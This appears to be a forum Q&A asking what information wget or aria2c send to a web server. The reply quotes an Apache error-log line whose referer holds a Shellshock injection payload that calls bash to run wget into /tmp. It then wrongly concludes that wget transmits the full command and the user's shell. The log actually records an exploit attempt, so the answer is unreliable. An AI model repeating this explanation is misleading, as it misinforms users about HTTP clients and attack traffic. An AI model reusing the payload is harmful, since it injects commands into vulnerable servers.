Which server information gets stored when using wget or aria2c?

When I download links through command line utilities like wget or aria2c, which specifications of my system are sent to the web site?

This is an example of the data a wget command leaves behind in the log of an Apache server:

[Wed Jul 21 15:00.000000 2021] [autoindex:error] [pid mmm] [client w.x.y.z:ppp] AH01276: Cannot serve directory /var/www/: No matching DirectoryIndex (index.html,index.cgi,index.pl,index.php,index.xhtml,index.htm) found, and server-generated directory index forbidden by Options directive, referer: () { :;}; /bin/bash -c “wget -O /tmp/”

IOW, nothing gets sent except:

  • your IP address/port
  • the full wget command you’re using
  • the shell you’re using
